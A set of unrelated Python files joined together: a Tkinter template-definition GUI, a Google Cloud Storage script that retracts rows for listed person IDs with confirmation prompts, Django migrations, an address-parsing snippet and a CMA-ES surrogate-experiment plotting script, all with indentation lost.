if self.i == None:
self.data_uncomm = InputTemplate() # Empty template
self.data_uncomm.file_type = "Delimited Text"
self.data_uncomm.delim = ","
else:
self.data_uncomm = deepcopy(self.data_ref[i])
# Insert input frames
self.name_in = TextEntryFrame(
self,
"Template Name:",
225, 95)
self.name_in.grid(row=1, column=1, sticky=W)
self.type_in = ComboboxFrame(
self,
"File Type:",
("Delimited Text", "Spreadsheet"),
225, 95)
self.type_in.grid(row=2, column=1, sticky=W)
self.delim_in = TextEntryFrame(
self,
"Delimiter:",
150, 65)
self.delim_in.grid(row=2, column=2, sticky=W)
self.suff_in = TextEntryFrame(
self,
"Filename Suffix:",
225, 95)
self.suff_in.grid(row=3, column=1, sticky=W)
# Create "Single Value Extract" and "Range Extract" frames
self.single_frame = TemplateExtractFrame(
self,
self.data_uncomm,
"Extract Single Value",
self.data_uncomm.file_type)
self.single_frame.grid(
row=4, column=1, columnspan=2, pady=2, sticky=W)
self.range_frame = TemplateExtractFrame(
self,
self.data_uncomm,
"Extract Range",
self.data_uncomm.file_type)
self.range_frame.grid(
row=5, column=1, columnspan=2, pady=2, sticky=W)
# Create Buttons
btn_ok = Button(
self, text="OK", width=15,
command=self.commit)
btn_ok.grid(row=6, column=2, pady=5, sticky=E)
# Prefill data if necessary
if i != None:
self.name_in.entry_input.set(data_ref[i].name)
self.type_in.combox_input.set(data_ref[i].file_type)
self.delim_in.entry_input.set(data_ref[i].delim)
self.suff_in.entry_input.set(data_ref[i].suffix)
self.single_frame.scrframe.update_data()
self.single_frame.scrframe.reconcile_lines()
self.range_frame.scrframe.update_data()
self.range_frame.scrframe.reconcile_lines()
# Wipe data if window closes
self.protocol("WM_DELETE_WINDOW", self.on_close)
# Clear extraction values and ranges and enable/disable delimiter
# entry box on file type change
self.type_in.combox_input.trace("w", self.type_change)
def commit(self):
# Move template data in self.data_uncomm to the data container
# referenced by self.data_ref
self.data_uncomm.name = self.name_in.entry_input.get()
self.data_uncomm.file_type = self.type_in.combox_input.get()
self.data_uncomm.delim = self.delim_in.entry_input.get()
self.data_uncomm.suffix = self.suff_in.entry_input.get()
# Show error message if required fields are empty
if not self.data_uncomm.check():
messagebox.showerror(
"User Input Error",
"Invalid input given for template definition." +
"Template definition must have a name, valid delimiter " +
"character, and at least one extraction value or range.",
parent=self)
elif self.i == None:
self.data_ref.append(self.data_uncomm)
self.display.update_data(len(self.data_ref) - 1)
self.display.reconcile_lines(len(self.data_ref) - 1)
self.destroy()
else:
del self.data_ref[self.i]
self.data_ref.insert(self.i, self.data_uncomm)
self.display.update_data(self.i)
self.display.reconcile_lines(self.i)
self.destroy()
def on_close(self):
self.destroy()
self.data_uncomm.vals.clear()
self.data_uncomm.ranges.clear()
def type_change(self, *args):
self.data_uncomm.vals.clear()
self.data_uncomm.ranges.clear()
self.single_frame.scrframe.update_data()
self.single_frame.scrframe.reconcile_lines()
self.range_frame.scrframe.update_data()
self.range_frame.scrframe.reconcile_lines()
self.data_uncomm.file_type = self.type_in.combox_input.get()
self.single_frame.scrframe.file_type = self.type_in.combox_input.get()
self.range_frame.scrframe.file_type = self.type_in.combox_input.get()
if self.type_in.combox_input.get() == "Delimited Text":
self.delim_in.enable()
else:
self.delim_in.disable()
class AddSingleValueGUI(Toplevel):
"""
GUI pop up window that allows the user to specify the value to be
extracted.
"""
def __init__(self, data_ref, display, file_type, i=None):
# Initialize and configure window
Toplevel.__init__(self)
self.title("Extract Single Value")
self.rowconfigure(0, minsize=5)
self.columnconfigure(0, minsize=5)
self.columnconfigure(2, minsize=5)
# Intialize attributes
self.data_ref = data_ref # Ref to the uncommitted template
self.display = display # Ref to the display frame that called this GUI
self.i = i
self.store = ExtractVal("", "Filename", "", "", file_type)
self.file_type = file_type
# Create data entry frames
self.name_in = TextEntryFrame(
self,
"Name:",
250, 75)
self.name_in.grid(row=1, column=1, sticky=W)
if file_type == "Delimited Text":
line_vals = tuple(["Filename"] + list(range(1, 100)))
else:
line_vals = ("---")
self.line_in = SpboxFrame(
self,
"Line:",
line_vals,
200, 75)
self.line_in.grid(row=2, column=1, sticky=W)
if file_type == "Spreadsheet":
sheet_vals = tuple(["Filename"] + list(range(0, 100)))
else:
sheet_vals = ("---")
self.sheet_in = SpboxFrame(
self,
"Sheet:",
sheet_vals,
200, 75)
self.sheet_in.grid(row=3, column=1, sticky=W)
self.rule_in = TextEntryFrame(
self,
"Rule/Source:",
250, 75)
self.rule_in.grid(row=4, column=1, sticky=W)
if i != None:
self.name_in.entry_input.set(data_ref.vals[i].name)
self.line_in.spbox_input.set(data_ref.vals[i].line)
self.sheet_in.spbox_input.set(data_ref.vals[i].sheet)
self.rule_in.entry_input.set(data_ref.vals[i].rule)
# Create Add button
btn_add = Button(
self,
text="Accept",
command=self.commit)
btn_add.grid(row=5, column=1, pady=5, sticky=E)
def commit(self):
# Check if name exists in extract values/ranges for current
# set of uncommitted templates
check_name = True
for template in self.display.master.master.data_ref:
for obj in (template.vals + template.ranges):
if self.name_in.entry_input.get() == obj.name:
check_name=False
# Give error for duplicate name
if not check_name:
messagebox.showerror(
"User Input Error",
"Name given to value is already in use. Please use " +
"a different name.")
# Perform check for empty input and add data to template
else:
self.store.name = self.name_in.entry_input.get()
self.store.rule = self.rule_in.entry_input.get()
if self.file_type == "Delimited Text":
if self.line_in.spbox_input.get() == "Filename":
self.store.line = self.line_in.spbox_input.get()
else:
self.store.line = int(self.line_in.spbox_input.get())
self.store.sheet = self.sheet_in.spbox_input.get()
if self.file_type == "Spreadsheet":
if self.sheet_in.spbox_input.get() == "Filename":
self.store.sheet = self.sheet_in.spbox_input.get()
else:
self.store.sheet = int(self.sheet_in.spbox_input.get())
# Show error if there are empty fields
if not self.store.check():
messagebox.showerror(
"User Input Error",
"Value definition requires a valid name and rule/source. " +
"Rule/source must be a valid RegEx string for 'Delimited " +
"Text' file type or a valid cell reference for " +
"'Spreadsheet' file type.",
parent=self)
elif self.i == None:
self.data_ref.vals.append(self.store)
self.display.update_data()
self.display.reconcile_lines(len(self.data_ref.vals) - 1)
self.destroy()
else:
del self.data_ref.vals[self.i]
self.data_ref.vals.insert(self.i, self.store)
self.display.update_data()
self.display.reconcile_lines(self.i)
self.destroy()
class AddRangeGUI(Toplevel):
"""
GUI pop up window that allows the user to specify the range to be
extracted.
"""
def __init__(self, data_ref, display, file_type, i=None):
# Initialize and configure window
Toplevel.__init__(self)
self.title("Extract Range")
self.rowconfigure(0, minsize=5)
self.columnconfigure(0, minsize=5)
self.columnconfigure(2, minsize=5)
# Initialize attributes
self.data_ref = data_ref # Ref to the uncommitted template
self.display = display # Ref to the display frame that called this GUI
self.i = i
self.store = ExtractRange("", "", "", file_type)
# Create data entry frames
self.name_in = TextEntryFrame(
self,
"Name:",
250, 75)
self.name_in.grid(row=1, column=1, sticky=W)
if file_type == "Spreadsheet":
sheet_vals = tuple(range(0, 100))
else:
sheet_vals = ("---")
self.sheet_in = SpboxFrame(
self,
"Sheet:",
sheet_vals,
200, 75)
self.sheet_in.grid(row=2, column=1, sticky=W)
self.rule_in = TextEntryFrame(
self,
"Rule/Source:",
250, 75)
self.rule_in.grid(row=3, column=1, sticky=W)
# Prefill data if necessary
if i != None:
self.name_in.entry_input.set(data_ref.ranges[i].name)
self.sheet_in.spbox_input.set(data_ref.ranges[i].sheet)
self.rule_in.entry_input.set(data_ref.ranges[i].rule)
# Create Add button
btn_add = Button(
self,
text="Accept",
command=self.commit)
btn_add.grid(row=4, column=1, pady=5, sticky=E)
def commit(self):
# Check if name exists in extract values/ranges for current
# set of uncommitted templates
check_name = True
for template in self.display.master.master.data_ref:
for obj in (template.vals + template.ranges):
if self.name_in.entry_input.get() == obj.name:
check_name = False
# Give error for duplicate name
if not check_name:
messagebox.showerror(
"User Input Error",
"Name given to value is already in use. Please use " +
"a different name.",
parent=self)
# Perform check for empty input and add data to template
else:
self.store.name = self.name_in.entry_input.get()
self.store.rule = self.rule_in.entry_input.get()
if self.sheet_in.spbox_input.get() == "---":
self.store.sheet = self.sheet_in.spbox_input.get()
else:
self.store.sheet = int(self.sheet_in.spbox_input.get())
# Show error if there are empty fields
if not self.store.check():
messagebox.showerror(
"User Input Error",
"Range definition requires a valid name and rule/source. " +
"Rule/source must be string of the form '#,#,#,#' for "+
"'Delimited Text' file type or a valid range reference for " +
"'Spreadsheet' file type.",
parent=self)
elif self.i == None:
self.data_ref.ranges.append(self.store)
self.display.update_data()
self.display.reconcile_lines(len(self.data_ref.ranges) - 1)
self.destroy()
else:
del self.data_ref.ranges[self.i]
self.data_ref.ranges.insert(self.i, self.store)
self.display.update_data()
self.display.reconcile_lines(self.i)
self.destroy() |
#!/usr/bin/env python
"""
This script retracts rows for specified pids from the site's submissions located in the archive
The pids must be specified via a pid table containing a person_id and research_id
The pid table must be located in the sandbox_dataset
The schema for the pid table is located in retract_data_bq.py as PID_TABLE_FIELDS
If the submission folder is set to 'all_folders', all the submissions from the site will be considered for retraction
If a submission folder is specified, only that folder will be considered for retraction
"""
import os
from io import BytesIO
import argparse
import logging
from google.cloud import storage, bigquery
import common
from utils import pipeline_logging, gcs
EXTRACT_PIDS_QUERY = """
SELECT person_id
FROM `{project_id}.{sandbox_dataset_id}.{pid_table_id}`
"""
PID_IN_COL1 = [common.PERSON, common.DEATH] + common.PII_TABLES
PID_IN_COL2 = [
common.VISIT_OCCURRENCE, common.CONDITION_OCCURRENCE, common.DRUG_EXPOSURE,
common.MEASUREMENT, common.PROCEDURE_OCCURRENCE, common.OBSERVATION,
common.DEVICE_EXPOSURE, common.SPECIMEN, common.NOTE
]
def run_gcs_retraction(project_id,
sandbox_dataset_id,
pid_table_id,
hpo_id,
folder,
force_flag,
bucket=None,
site_bucket=None):
"""
Retract from a folder/folders in a GCS bucket all records associated with a pid
:param project_id: project contaning the sandbox dataset
:param sandbox_dataset_id: dataset containing the pid_table
:param pid_table_id: table containing the person_ids whose data needs to be retracted
:param hpo_id: hpo_id of the site to run retraction on
:param folder: the site's submission folder; if set to 'all_folders', retract from all folders by the site
if set to 'none', skip retraction from bucket folders
:param force_flag: if False then prompt for each file
:param bucket: DRC bucket maintained by curation
:param site_bucket: Site's bucket name
"""
# extract the pids
pids = extract_pids_from_table(project_id, sandbox_dataset_id, pid_table_id)
if not bucket:
bucket = os.environ.get('DRC_BUCKET_NAME')
gcs_client = storage.Client(project_id)
logging.info(f'Retracting from bucket {bucket}')
if hpo_id == 'none':
logging.info('"RETRACTION_HPO_ID" set to "none", skipping retraction')
full_bucket_path = ''
folder_prefixes = []
else:
if not site_bucket:
site_bucket = os.environ.get(f'BUCKET_NAME_{hpo_id.upper()}')
full_bucket_path = bucket + '/' + hpo_id + '/' + site_bucket
prefix = f'{hpo_id}/{site_bucket}/'
# retract from latest folders first
folder_prefixes = gcs.list_sub_prefixes(gcs_client, bucket, prefix)
folder_prefixes.sort(reverse=True)
if folder == 'all_folders':
to_process_folder_list = folder_prefixes
elif folder == 'none':
logging.info(
'"RETRACTION_SUBMISSION_FOLDER" set to "none", skipping retraction')
to_process_folder_list = []
else:
folder_path = full_bucket_path + '/' + folder if folder[
-1] == '/' else full_bucket_path + '/' + folder + '/'
if folder_path in folder_prefixes:
to_process_folder_list = [folder_path]
else:
logging.info(
f'Folder {folder} does not exist in {full_bucket_path}. Exiting'
)
return
logging.info("Retracting data from the following folders:")
logging.info([
bucket + '/' + folder_prefix for folder_prefix in to_process_folder_list
])
for folder_prefix in to_process_folder_list:
logging.info(f'Processing gs://{bucket}/{folder_prefix}')
# separate cdm from the unknown (unexpected) files
bucket_item_objs = gcs_client.list_blobs(bucket,
prefix=folder_prefix,
delimiter='/')
folder_items = [blob.name for blob in bucket_item_objs]
found_files = []
file_names = [item.split('/')[-1] for item in folder_items]
for item in file_names:
# Only retract from CDM or PII files containing PIDs
item = item.lower()
table_name = item.split('.')[0]
if table_name in PID_IN_COL1 + PID_IN_COL2:
found_files.append(item)
logging.info('Found the following files to retract data from:')
logging.info([
bucket + '/' + folder_prefix + file_name
for file_name in found_files
])
logging.info("Proceed?")
if force_flag:
logging.info(
f"Attempting to force retract for folder {folder_prefix} in bucket {bucket}"
)
response = "Y"
else:
# Make sure user types Y to proceed
response = get_response()
if response == "Y":
retract(gcs_client, pids, bucket, found_files, folder_prefix,
force_flag)
logging.info(
f"Retraction completed for folder {bucket}/{folder_prefix}")
elif response.lower() == "n":
logging.info(f"Skipping folder {folder_prefix}")
logging.info("Retraction from GCS complete")
return
def retract(gcs_client, pids, bucket, found_files, folder_prefix, force_flag):
"""
Retract from a folder in a GCS bucket all records associated with a pid
pid table must follow schema described in retract_data_bq.PID_TABLE_FIELDS and must reside in sandbox_dataset_id
This function removes lines from all files containing person_ids if they exist in pid_table_id
Throws SyntaxError/TypeError/ValueError if non-ints are found
:param gcs_client: google cloud storage client
:param pids: person_ids to retract
:param bucket: bucket containing records to retract
:param found_files: files found in the current folder
:param folder_prefix: current folder being processed
:param force_flag: if False then prompt for each file
"""
for file_name in found_files:
table_name = file_name.split(".")[0]
lines_removed = 0
file_gcs_path = f'{bucket}/{folder_prefix}{file_name}'
if force_flag:
logging.info(f"Downloading file in path {file_gcs_path}")
response = "Y"
else:
# Make sure user types Y to proceed
logging.info(
f"Are you sure you want to retract rows for person_ids {pids} from path {file_gcs_path}?"
)
response = get_response()
if response == "Y":
# Output and input file content initialization
retracted_file_string = BytesIO()
gcs_bucket = gcs_client.bucket(bucket)
blob = gcs_bucket.blob(folder_prefix + file_name)
input_file_lines = blob.download_as_string().split(b'\n')
if len(input_file_lines) < 2:
continue
input_header = input_file_lines[0]
input_contents = input_file_lines[1:]
retracted_file_string.write(input_header + b'\n')
logging.info(
f"Checking for person_ids {pids} in path {file_gcs_path}")
# Check if file has person_id in first or second column
for input_line in input_contents:
input_line = input_line.strip()
# ensure line is not empty
if input_line:
cols = input_line.split(b',')
# ensure at least two columns exist
if len(cols) > 1:
col_1 = cols[0].replace(b'"', b'')
col_2 = cols[1].replace(b'"', b'')
# skip if non-integer is encountered and keep the line as is
try:
if ((table_name in PID_IN_COL1 and
int(col_1) in pids) or
(table_name in PID_IN_COL2 and
int(col_2) in pids)):
# do not write back this line since it contains a pid to retract
# increment removed lines counter
lines_removed += 1
else:
# pid not found, retain this line
retracted_file_string.write(input_line + b'\n')
except ValueError:
# write back non-num lines
retracted_file_string.write(input_line + b'\n')
else:
# write back ill-formed lines. Note: These lines do not make it into BigQuery
retracted_file_string.write(input_line + b'\n')
# Write result back to bucket
if lines_removed > 0:
logging.info(
f"{lines_removed} rows retracted from {file_gcs_path}")
logging.info(f"Uploading to overwrite...")
new_blob = gcs_bucket.blob(folder_prefix + file_name)
new_blob.upload_from_file(retracted_file_string,
rewind=True,
content_type='text/csv')
logging.info(f"Retraction successful for file {file_gcs_path}")
else:
logging.info(
f"Not updating file {file_gcs_path} since pids {pids} not found"
)
elif response.lower() == "n":
logging.info(f"Skipping file {file_gcs_path}")
return
# Make sure user types Y to proceed
def get_response():
prompt_text = 'Please press Y/n\n'
response = input(prompt_text)
while response not in ('Y', 'n', 'N'):
response = input(prompt_text)
return response
def extract_pids_from_table(project_id, sandbox_dataset_id, pid_table_id):
"""
Extracts person_ids from table in BQ in the form of a set of integers
:param project_id: project containing the sandbox dataset with pid table
:param sandbox_dataset_id: dataset containing the pid table
:param pid_table_id: identifies the table containing the person_ids to retract
:return: set of integer pids
"""
q = EXTRACT_PIDS_QUERY.format(project_id=project_id,
sandbox_dataset_id=sandbox_dataset_id,
pid_table_id=pid_table_id)
client = bigquery.Client(project_id)
job = client.query(q)
pids = job.result().to_dataframe()['person_id'].to_list()
return pids
if __name__ == '__main__':
pipeline_logging.configure(logging.DEBUG, add_console_handler=True)
parser = argparse.ArgumentParser(
description=
'Performs retraction on bucket files for site to retract data for, '
'determined by hpo_id. Uses project_id, sandbox_dataset_id and '
'pid_table_id to determine the pids to retract data for. '
'Folder name is optional. Will retract from all folders for the site '
'if unspecified. Force flag overrides prompts for each folder.',
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument(
'-p',
'--project_id',
action='store',
dest='project_id',
help='Identifies the project containing the sandbox dataset',
required=True)
parser.add_argument('-s',
'--sandbox_dataset_id',
action='store',
dest='sandbox_dataset_id',
help='Identifies the dataset containing the pid table',
required=True)
parser.add_argument(
'-t',
'--pid_table_id',
action='store',
dest='pid_table_id',
help='Identifies the table containing the person_ids for retraction',
required=True)
parser.add_argument('-i',
'--hpo_id',
action='store',
dest='hpo_id',
help='Identifies the site to retract data from',
required=True)
parser.add_argument(
'-n',
'--folder_name',
action='store',
dest='folder_name',
help='Name of the folder to retract from'
'If set to "none", skips retraction'
'If set to "all_folders", retracts from all folders by the site',
required=True)
parser.add_argument(
'-f',
'--force_flag',
dest='force_flag',
action='store_true',
help='Optional. Indicates pids must be retracted without user prompts',
required=False)
args = parser.parse_args()
run_gcs_retraction(args.project_id, args.sandbox_dataset_id,
args.pid_table_id, args.hpo_id, args.folder_name,
args.force_flag)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-09-02 01:37
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('recipes', '0005_auto_20170627_0052'),
]
operations = [
migrations.AlterField(
model_name='recipe',
name='recipe_description',
field=models.TextField(blank=True),
),
]
|
from simpleaddress import simpleaddress
# patch in a data specific value
simpleaddress.replacemap["no."]="N"
def parts(address):
number, street=address.split(" ",1)
unit=""
for test in [" Suite "," Unit "]:
if test in street:
street,ste,uni=street.partition(test)
unit=ste.lstrip()+uni
street=street.strip(",")
return number, street, unit
addresses="""3-3300 Kuhio Hwy
11400 Highway 99
2909 Austell Rd Sw Suite 100
1334 Flammang Dr
1335 No. Flamingo Ln.""".splitlines()
for address in addresses:
normal=simpleaddress.normalize(address)
#~ print(address, normal)
expand=simpleaddress.expand_streetname(normal)
#~ print(address, expand)
number, street, unit=parts(expand)
print(number, street, unit, sep="|") |
# Generated by Django 3.2.5 on 2021-08-05 02:30
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0002_auto_20210802_1421'),
]
operations = [
migrations.CreateModel(
name='AttendanceRecord',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('entry_datetime', models.DateTimeField()),
('exit_datetime', models.DateTimeField()),
('attendee_email', models.CharField(max_length=255)),
('room', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.building')),
],
),
migrations.AddIndex(
model_name='attendancerecord',
index=models.Index(fields=['attendee_email'], name='attendee_email_index'),
),
migrations.AddIndex(
model_name='attendancerecord',
index=models.Index(fields=['entry_datetime', 'exit_datetime'], name='entry_and_exit_attendee_index'),
),
]
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
post_process.py: This file is intended to perform some simple post-processing
based on the data files generated by the CMA-ES.
"""
__author__ = 'Sander van Rijn'
__email__ = 's.j.van.rijn@liacs.leidenuniv.nl'
from config import experiment_repetitions, fit_funcs, fit_func_dims, folder_name
from config import suffix, data_ext, plot_ext, data_dir, plot_dir, base_dir
from multiLevelCoSurrogates import guaranteeFolderExists, createsurface, plotsurfaces
from itertools import product
from matplotlib import pyplot as plt
from collections import namedtuple
import numpy as np
import pandas as pd
surrogates = ['Kriging', 'RBF', 'RandomForest', 'NoSurrogate'] # , 'SVM'
# uses = ['reg', 'EGO-reg', 'MF', 'scaled-MF', 'MF-bisurr', 'scaled-MF-bisurr']
uses = ['reg', 'EGO-reg', 'scaled-MF']
gen_intervals = [0, 1, 2, 3, 5, 10, 20]
lambda_pres = [0, 2] # , 4, 8]
figsize = (6, 4.5)
Index = namedtuple('Index', ['fitfunc', 'surrogate', 'usage', 'repetition', 'genint', 'lambda_pre'])
TimingData = namedtuple('TimingData', ['function', 'surrogate', 'usage', 'repetition',
'gen_int', 'lambda_pre', 'time'])
x_lims = {
'bohachevsky': 100,
'booth': 250,
'branin': 500,
'himmelblau': 500,
'sixHumpCamelBack': 50,
'park91a': 500,
'park91b': 500,
'borehole': 50,
}
z_lims = {
'bohachevsky': 75,
'booth': 1500,
# 'branin': 1500,
'himmelblau': 600,
'sixHumpCamelBack': 150,
}
def interpret_as_slice(column):
"""Interprets the 'column' argument of loadFitnessHistory into a slice()"""
if column is None: # No specific column is requested, return everything
return slice(None)
elif isinstance(column, int): # One specific column is requested
return slice(column, column + 1)
elif len(column) == 2 and all(isinstance(val, int) for val in column): # Multiple columns are requested
return slice(*column)
else: # 'column' does not match expected format
raise Exception("Invalid format for 'column': {col}".format(col=column))
# TODO: replace by regular/proper csv files...
def load_fitnesshistory(fname, column=None):
"""
Return the data stored in the given filename as float values.
Optionally, only data from a single, or range of columns can be selected.
:param fname: The name of the file to retrieve the data from
:param column: Single or double integer to indicate desired column (optional)
:return: (Selected) data from the given file in 2D list format
"""
with open(fname, 'r') as f:
next(f) # Skip the first line which only contains header information
return [list(map(float, line.split(' ')[interpret_as_slice(column)])) for line in f]
# TODO: Rewrite all plotting functions to plot from a list of 'Index' namedtuples
def getdata():
fit_func_names = fit_funcs.keys()
experiments = product(fit_func_names, surrogates, uses,
range(experiment_repetitions), gen_intervals, lambda_pres)
data = {}
for fit_func_name, surrogate_name, use, rep, gen_int, lambda_pre_mul in experiments:
idx = Index(fit_func_name, surrogate_name, use, rep, gen_int, lambda_pre_mul)
ndim = fit_func_dims[fit_func_name]
lambda_pre = (4 + int(3 * np.log(ndim))) * lambda_pre_mul
if surrogate_name == 'NoSurrogate' and use is not 'reg':
continue
elif use == 'EGO-reg' and surrogate_name not in ['Kriging', 'RandomForest']:
continue
fname = folder_name.format(ndim=ndim, func=fit_func_name, use=use, surr=surrogate_name)
fsuff = suffix.format(size=lambda_pre, rep=rep, gen=gen_int)
filename_prefix = f'{base_dir}data/{fname}{fsuff}'
# TODO: better determine optimal values for each function
try:
data[idx] = np.array(load_fitnesshistory(f"{filename_prefix}reslog.{data_ext}", column=(1, -1)))
if fit_func_name == 'borehole':
data[idx] *= -1
elif fit_func_name == 'park91b':
data[idx] -= 0.666666666666 # Manually extracted minimum found value...
elif fit_func_name == 'branin':
data[idx] += 320.731611436 # Manually extracted minimum found value...
except:
pass
print("done")
return data
def timingdatatocsv():
fit_func_names = fit_funcs.keys()
experiments = product(fit_func_names, surrogates, uses,
range(experiment_repetitions), gen_intervals, lambda_pres)
data = []
for fit_func_name, surrogate_name, use, rep, gen_int, lambda_pre_mul in experiments:
ndim = fit_func_dims[fit_func_name]
lambda_pre = (4 + int(3 * np.log(ndim))) * lambda_pre_mul
if surrogate_name == 'NoSurrogate' and use is not 'reg':
continue
elif use == 'EGO-reg' and surrogate_name not in ['Kriging', 'RandomForest']:
continue
fname = folder_name.format(ndim=ndim, func=fit_func_name, use=use, surr=surrogate_name)
fsuff = suffix.format(size=lambda_pre, rep=rep, gen=gen_int)
filename_prefix = f'{data_dir}{fname}{fsuff}'
try:
# In this case, we only ever expect a single value per file
time = np.array(load_fitnesshistory(f"{filename_prefix}timelog.{data_ext}", column=(1, -1)))[0][0]
tup = TimingData(fit_func_name, surrogate_name, use, rep, gen_int, lambda_pre_mul, time)
data.append(tup)
except:
pass
df = pd.DataFrame(data, columns=TimingData._fields)
df.to_csv(f'{data_dir}timing_summary.csv')
print("done")
def getplottingvalues(total_data, min_perc=25, max_perc=75):
max_len = max([len(dat) for dat in total_data])
new_data = [dat.tolist() + [dat[-1]]*(max_len - len(dat)) for dat in total_data]
new_data = np.stack(new_data)
# Workaround to prevent negative values
true_min = np.min(new_data)
if true_min <= 0:
positive = new_data > 0
try:
min_pos = np.min(new_data[positive])
except Exception as e:
print(new_data)
print(new_data[positive])
new_data[~positive] = min_pos
minimum = np.percentile(new_data, min_perc, axis=0)
mean = np.mean(new_data, axis=0)
median = np.percentile(new_data, 50, axis=0)
maximum = np.percentile(new_data, max_perc, axis=0)
return minimum, mean, median, maximum
def compare_by_genint(data):
"""Create and save plots comparing the median convergence of `experiment_repetitions`
runs for various uses of each surrogate"""
fit_func_names = fit_funcs.keys()
np.set_printoptions(precision=3, linewidth=2000)
for fit_func_name, surrogate_name, use in product(fit_func_names, surrogates, uses):
if fit_func_name == 'himmelblau_seb':
continue
if surrogate_name == 'NoSurrogate' and use is not 'reg':
continue
elif use == 'EGO-reg' and surrogate_name not in ['Kriging', 'RandomForest']:
continue
plt.figure(figsize=figsize)
num_plotted = 0
for gen_int, lambda_pre in product(gen_intervals, lambda_pres):
total_data = []
for rep in range(experiment_repetitions):
try:
idx = Index(fit_func_name, surrogate_name, use, rep, gen_int, lambda_pre)
dat = data[idx]
except:
continue
try:
dat = np.ma.masked_invalid(dat).min(axis=1)
dat = np.minimum.accumulate(dat)
total_data.append(dat)
except Exception as e:
print(idx)
print(dat)
if not total_data:
continue
minimum, mean, median, maximum = getplottingvalues(total_data)
plt.plot(median, label='g_int='+str(gen_int))
plt.fill_between(np.arange(len(minimum)), minimum, maximum, interpolate=True, alpha=0.2)
num_plotted += 1
if num_plotted <= 1:
plt.close()
continue
guaranteeFolderExists(f'{plot_dir}by_genint/')
plt.title(f'{fit_func_name}')
plt.xlabel('High Fidelity Evaluations')
plt.xlim(0, x_lims[fit_func_name])
plt.ylabel('Fitness value')
plt.yscale('log')
plt.legend(loc=0)
plt.tight_layout()
plt.savefig(f"{plot_dir}by_genint/{fit_func_name}-{surrogate_name}-{use}.{plot_ext}")
plt.close()
print("all plotted")
def compare_by_use(data):
"""Create and save plots comparing the median convergence of `experiment_repetitions`
runs for various uses of each surrogate"""
fit_func_names = fit_funcs.keys()
np.set_printoptions(precision=3, linewidth=2000)
for fit_func_name, gen_int_ in product(fit_func_names, gen_intervals):
if fit_func_name == 'himmelblau_seb':
continue
plt.figure(figsize=figsize)
num_plotted = 0
for surrogate_name, use, lambda_pre, gen_int in product(surrogates, uses, lambda_pres, [gen_int_]):
total_data = []
if surrogate_name == 'NoSurrogate' and use is not 'reg':
continue
elif use == 'EGO-reg' and surrogate_name not in ['Kriging', 'RandomForest']:
continue
for rep in range(experiment_repetitions):
try:
idx = Index(fit_func_name, surrogate_name, use, rep, gen_int, lambda_pre)
dat = data[idx]
except:
continue
try:
dat = np.ma.masked_invalid(dat).min(axis=1)
dat = np.minimum.accumulate(dat)
total_data.append(dat)
except Exception as e:
print(idx)
print(dat)
if not total_data:
continue
minimum, mean, median, maximum = getplottingvalues(total_data)
plt.plot(median, label=f'{surrogate_name} - {"c" if use != "reg" else ""}SA-CMA-ES')
plt.fill_between(np.arange(len(minimum)), minimum, maximum, interpolate=True, alpha=0.2)
num_plotted += 1
if num_plotted <= 1:
plt.close()
continue
guaranteeFolderExists(f'{plot_dir}by_use/')
plt.title(f'{fit_func_name}')
plt.xlabel('High Fidelity Evaluations')
plt.xlim(0, x_lims[fit_func_name])
plt.ylabel('Fitness value')
plt.yscale('log')
plt.legend(loc=0)
plt.tight_layout()
plt.savefig(f"{plot_dir}by_use/{fit_func_name}--{str(gen_int_)}.{plot_ext}")
plt.close()
print("all plotted")
def compare_by_surrogate(data):
"""Create and save plots comparing the median convergence of `experiment_repetitions`
runs for various uses of each surrogate"""
fit_func_names = fit_funcs.keys()
np.set_printoptions(precision=3, linewidth=2000)
for fit_func_name, use, gen_int_ in product(fit_func_names, uses, gen_intervals):
if fit_func_name == 'himmelblau_seb':
continue
plt.figure(figsize=figsize)
num_plotted = 0
for surrogate_name, lambda_pre, gen_int in product(surrogates, lambda_pres, [0, gen_int_]):
total_data = []
if use == 'EGO-reg' and surrogate_name not in ['Kriging', 'RandomForest']:
continue
for rep in range(experiment_repetitions):
try:
idx = Index(fit_func_name, surrogate_name, use, rep, gen_int, lambda_pre)
dat = data[idx]
except:
continue
try:
dat = np.ma.masked_invalid(dat).min(axis=1)
dat = np.minimum.accumulate(dat)
total_data.append(dat)
except Exception as e:
print(idx)
print(dat)
if not total_data:
continue
minimum, mean, median, maximum = getplottingvalues(total_data)
plt.plot(median, label=f'{surrogate_name}')
plt.fill_between(np.arange(len(minimum)), minimum, maximum, interpolate=True, alpha=0.2)
num_plotted += 1
if num_plotted <= 1:
plt.close()
continue
guaranteeFolderExists(f'{plot_dir}by_surrogate/')
plt.title(f'{fit_func_name}')
plt.xlabel('High Fidelity Evaluations')
plt.xlim(0, x_lims[fit_func_name])
plt.ylabel('Fitness value')
plt.yscale('log')
plt.legend(loc=0)
plt.tight_layout()
plt.savefig(f"{plot_dir}by_surrogate/{fit_func_name}-{use}-{str(gen_int)}.{plot_ext}")
plt.close()
print("all plotted")
def make2dvisualizations(func, l_bound, u_bound, name, num_intervals=200):
surface = createsurface(func, l_bound, u_bound, step=(u_bound - l_bound) / num_intervals)
save_name = f'{plot_dir}surfaces/{name}.{plot_ext}'
plotsurfaces([surface], titles=[name], figratio=(6,4), save_as=save_name, show=True)
def plot_function_surfaces():
# for name, fit_func in list(fit_funcs.items())[:5]:
#
# #TODO: make bounds np.arrays in the function package?
# l_bound = np.array(fit_func.l_bound, dtype=np.float64)
# u_bound = np.array(fit_func.u_bound, dtype=np.float64)
#
# for fid in fit_func.fidelity_names:
# func = getattr(fit_func, fid)
# make2dvisualizations(func, l_bound, u_bound, '_'.join((name, fid)))
guaranteeFolderExists(f'{plot_dir}surfaces/')
fit_func = fit_funcs['himmelblau']
l_bound = np.array(fit_func.l_bound, dtype=np.float64)
u_bound = np.array(fit_func.u_bound, dtype=np.float64)
high = createsurface(fit_func.high, l_bound, u_bound)
low = createsurface(fit_func.low, l_bound, u_bound)
diff = high - low
for surf, name in zip([high, low, diff], ['high', 'low', 'diff']):
make2dvisualizations(surf, l_bound, u_bound, f'himmelblau_{name}')
def run():
data = getdata()
compare_by_use(data)
compare_by_genint(data)
